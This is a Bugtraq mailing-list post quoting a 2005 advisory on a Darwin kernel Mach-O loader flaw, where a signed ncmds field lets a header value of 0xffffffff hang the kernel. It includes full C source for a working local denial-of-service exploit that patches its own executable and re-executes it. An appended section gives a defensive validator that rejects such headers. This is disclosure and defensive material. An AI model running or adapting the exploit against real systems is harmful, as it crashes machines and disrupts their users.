Date: Thu, 20 Jan 2005 09:07:24 +0800
From: neil@...kridge.org
To: bugtraq@...urityfocus.com
Subject: Re: Darwin Kernel Vulnerability


On Wed, Jan 19, 2005 at 11:53:15AM -0800, nemo@...inemenace.org wrote:
> "moderator: resending this mail since it appears to have got dropped, if not, please ignore this message.
> 
>                      _,'|             _.-''``-...___..--';)
>                      /_ \'.      __..-' ,      ,--...--'''
>                     <\    .`--'''       `     /'
>                     `-';'               ;   ; ;
>                __...--''     ___...--_..'  .;.'
>            fL (,__....----'''       (,..--''  felinemenace.org
> 
>> Program:	Darwin Kernel 7.1
Effects <= Darwin Kernel 7.7.0
Sorry about the rushed advisory.
- nemo 
> Impact:		DoS, Possible local privilege escalation.	
> Discovered:	8th January 2005 by nemo -( nemo @ felinemenace.org )-
> Writeup and exploits:
> 
> 1) Background
> 
> Numerous bugs exist in the Darwin Kernel used by Mac OSX 10.3.
> Some of the bugs we investigated exist due to lack of input validation in the mach-o 
> loader.
> 
> 2) Description
> 
> In the file bsd/kern/mach_loader.c the mach-o header is parsed and for the most part
> each field is trusted to be acceptable.
> 
> In the mach-o loader code (parse_machfile()) ncmds and offset are both declared as 
> signed integers, however the appropriate structs used to read from the file are 
> unsigned.
> After a little investigation a DoS was quickly written to set ncmds to -1. 
> 
>     ncmds = header->ncmds;
>     while (ncmds--) {
> 
> The attached code will cause a denial of service on MacOSX <= 10.3.7
> 
> 3) Notes
> During our audit of the Darwin Kernel many bugs stood out, however we have not 
> had time to follow through on most of them. Something that caught our attention 
> was the misuse of the copyinstr() command. This function will not force a NULL
> character to be appended to the string copied in, however it seems in many cases
> the size passed to the function doesn't take this into account.
> Unfortunately, as security goes, it's all about who posts first.
> http://www.immunitysec.com/downloads/nukido.pdf
> 
> 4) Vendor status/notes/fixes/statements
> Apple have been notified about this bug.
> 
> 5) Exploit
> 
> //---------------------( fm-nacho.c )--------------------------
> /*
>  * DoS for Darwin Kernel Version < 7.5.0
>  * -(nemo@...ltheplug.org)-
>  * 2005
>  *
>  * greetz to awnex, cryp, nt, andrewg, arc, mercy, amnesia ;)
>  * irc.pulltheplug.org (#social)
>  */
> 
> #include <stdio.h>
> #include <stdlib.h>     /* exit() */
> #include <unistd.h>     /* sleep(), execv() */
> 
> int main(int ac, char **av)
> {
>         FILE *me;
>         int rpl = 0xffffffff;   /* ncmds becomes -1 once the loader reads it as a signed int */
>         fpos_t pos = 0x10;      /* file offset of the ncmds field in the mach_header (Darwin fpos_t is an integer) */
>         printf("-( nacho - 2004 DoS for OSX (darwin < 7.5.0 )-\n");
>         printf("-( nemo@...ltheplug.org )-\n\n");
>         printf("[+] Opening file for writing.\n");
>         /* the program patches its own executable in place */
>         if(!(me = fopen(*av,"r+"))) {
>                 printf("[-] Error opening exe.\n");
>                 exit(1);
>         }
>         printf("[+] Seeking to ncmds.\n");
>         /* fsetpos() returns non-zero on failure, not necessarily -1 */
>         if(fsetpos(me,&pos) != 0) {
>                 printf("[-] Error seeking to ncmds.\n");
>                 exit(1);
>         }
>         printf("[+] Changing ncmds to 0x%x.\n",rpl);
>         if(fwrite(&rpl,4,1,me) < 1) {
>                 printf("[-] Error writing to file.\n");
>                 exit(1);
>         }
>         fclose(me);
>         printf("[+] Re-executing with modified mach-o header.\n");
>         sleep(5);
>         if(execv(*av,av) == -1 ) {
>                 printf("[-] Error executing %s, please run manually.\n",*av);
>                 exit(1);
>         }
>         exit(0); // hrm
> }
> 
> 
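As an added illustration of the defensive side of the advisory above (this is not nemo's code and not Apple's loader), the following validator walks a 32-bit Mach-O header entirely in unsigned arithmetic and checks every size read from the file against what the buffer actually holds. The struct layouts follow the public Mach-O format; the function names (validate_macho32, build_sample, check_*) and the sample buffers are constructed for this example. The field at offset 0x10, which nacho overwrites, is ncmds; treating it as uint32_t and bounding it by sizeofcmds rejects the 0xffffffff value before any loop runs.

```c
/* Added example: bounds-checked parsing of a 32-bit Mach-O header.
 * Struct layouts follow the public Mach-O format; names and samples are
 * constructed for this example, not taken from the advisory or the kernel. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define MH_MAGIC   0xfeedface   /* 32-bit Mach-O, host byte order */
#define LC_SEGMENT 0x1

struct mach_header32 {
    uint32_t magic, cputype, cpusubtype, filetype;
    uint32_t ncmds;        /* unsigned in the file format; offset 0x10 */
    uint32_t sizeofcmds;   /* total bytes of all load commands */
    uint32_t flags;
};

struct load_command32 {
    uint32_t cmd;
    uint32_t cmdsize;
};

enum mo_status { MO_OK = 0, MO_BAD_MAGIC, MO_BAD_NCMDS, MO_BAD_SIZEOFCMDS, MO_BAD_CMDSIZE };

/* Validate header + load commands held in buf[0..len). Every value read
 * from the file is checked before it drives a loop or an offset, so an
 * ncmds of 0xffffffff is rejected up front rather than treated as -1. */
enum mo_status validate_macho32(const uint8_t *buf, size_t len)
{
    struct mach_header32 hdr;
    if (len < sizeof hdr) return MO_BAD_MAGIC;
    memcpy(&hdr, buf, sizeof hdr);
    if (hdr.magic != MH_MAGIC) return MO_BAD_MAGIC;

    size_t avail = len - sizeof hdr;
    if (hdr.sizeofcmds > avail) return MO_BAD_SIZEOFCMDS;
    /* at most one minimal load command per 8 bytes of sizeofcmds */
    if (hdr.ncmds > hdr.sizeofcmds / sizeof(struct load_command32)) return MO_BAD_NCMDS;

    size_t off = sizeof hdr;
    size_t end = sizeof hdr + hdr.sizeofcmds;
    for (uint32_t i = 0; i < hdr.ncmds; i++) {
        struct load_command32 lc;
        if (end - off < sizeof lc) return MO_BAD_CMDSIZE;
        memcpy(&lc, buf + off, sizeof lc);
        /* cmdsize must cover its own header, be 4-byte aligned and stay inside sizeofcmds */
        if (lc.cmdsize < sizeof lc || lc.cmdsize % 4 != 0 || lc.cmdsize > end - off)
            return MO_BAD_CMDSIZE;
        off += lc.cmdsize;
    }
    return MO_OK;
}

/* Constructed sample: one header followed by a single 56-byte load command
 * (8-byte command header plus 48 bytes of zero payload). Returns bytes written. */
size_t build_sample(uint8_t *out, uint32_t ncmds, uint32_t sizeofcmds, uint32_t cmdsize)
{
    struct mach_header32 hdr = { MH_MAGIC, 7, 3, 2, ncmds, sizeofcmds, 0 };
    struct load_command32 lc = { LC_SEGMENT, cmdsize };
    memcpy(out, &hdr, sizeof hdr);
    memcpy(out + sizeof hdr, &lc, sizeof lc);
    memset(out + sizeof hdr + sizeof lc, 0, 48);
    return sizeof hdr + sizeof lc + 48;
}

/* A well-formed file: ncmds = 1, sizeofcmds = cmdsize = 56. */
enum mo_status check_well_formed(void)
{
    uint8_t buf[128];
    size_t n = build_sample(buf, 1, 56, 56);
    return validate_macho32(buf, n);
}

/* The file as nacho leaves it: ncmds patched to 0xffffffff. */
enum mo_status check_patched_ncmds(void)
{
    uint8_t buf[128];
    size_t n = build_sample(buf, 0xffffffffu, 56, 56);
    return validate_macho32(buf, n);
}

/* A load command whose cmdsize runs past sizeofcmds. */
enum mo_status check_oversized_cmdsize(void)
{
    uint8_t buf[128];
    size_t n = build_sample(buf, 1, 56, 64);
    return validate_macho32(buf, n);
}

int main(void)
{
    printf("well-formed:        %d\n", check_well_formed());       /* 0 = MO_OK */
    printf("ncmds=0xffffffff:   %d\n", check_patched_ncmds());     /* 2 = MO_BAD_NCMDS */
    printf("oversized cmdsize:  %d\n", check_oversized_cmdsize()); /* 4 = MO_BAD_CMDSIZE */
    return 0;
}
```

The ncmds bound is derived from sizeofcmds rather than from a fixed constant, so a file cannot claim more commands than could physically fit in the bytes it declares; the per-command check then keeps each cmdsize inside that same region, which also covers the case where ncmds is plausible but an individual command is not.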

